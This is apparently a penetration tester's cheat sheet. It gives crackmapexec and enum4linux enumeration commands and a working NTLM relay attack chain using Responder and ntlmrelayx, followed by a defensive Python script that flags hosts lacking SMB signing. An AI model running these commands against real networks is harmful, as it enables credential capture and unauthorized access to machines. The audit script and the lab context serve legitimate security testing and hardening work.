w/o Creds
First enumeration
RHOSTS="192.168.1.0/24"
crackmapexec smb $RHOSTS
crackmapexec smb $RHOSTS -u 'a' -p '' --shares
crackmapexec rdp $RHOSTS
crackmapexec winrm $RHOSTS
crackmapexec ldap $RHOSTS
crackmapexec wmi $RHOSTS
enum4linux $RHOSTS
NetNTLM Relay
Responder answers any broadcast name-resolution request (mDNS, LLMNR, ...) and triggers authentication
ntlmrelayx relays the resulting NetNTLMv2 authentication to targets
Possible targets are servers without SMB signing; cme (crackmapexec) can build the list
cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
sudo responder -I tun0 -w
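Defender-side view of the same signing check, as an added example that is not part of the original notes: it parses saved `crackmapexec smb` banner lines and reports the hosts that still need SMB signing enforced or SMBv1 removed. The banner layout with `(signing:...)` and `(SMBv1:...)` fields is assumed from CME's usual output, and the sample hosts and the `audit` function name are constructed for illustration.

```python
import re

# Constructed sample of `crackmapexec smb <range>` output (not real hosts).
SAMPLE = """\
SMB         192.168.1.10    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.21    445    FILE01           [*] Windows Server 2016 Standard 14393 x64 (name:FILE01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.35    445    WS-035           [*] Windows 10.0 Build 19041 x64 (name:WS-035) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.35    445    WS-035           [-] corp.local\\a: STATUS_LOGON_FAILURE
"""

# Only the informational banner lines ("[*]") carry the signing/SMBv1 fields.
BANNER = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]"
    r".*\(signing:(?P<signing>True|False)\)(?:.*\(SMBv1:(?P<smbv1>True|False)\))?"
)

def audit(output):
    """Return {ip: (hostname, [issues])} for hosts that need remediation."""
    findings = {}
    for line in output.splitlines():
        m = BANNER.match(line)
        if not m:
            continue  # login results, errors, blank lines
        issues = []
        if m["signing"] == "False":
            issues.append("SMB signing not required (usable as NTLM relay target)")
        if m["smbv1"] == "True":  # None when the field is absent
            issues.append("SMBv1 enabled")
        if issues:
            findings[m["ip"]] = (m["host"], issues)
    return findings

if __name__ == "__main__":
    for ip, (host, issues) in sorted(audit(SAMPLE).items()):
        print(f"{ip:<15} {host:<10} {'; '.join(issues)}")
```

Hosts that appear in this report are the ones a relay list would contain; requiring SMB signing on them removes them from it.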
You can try to force NTLM authentication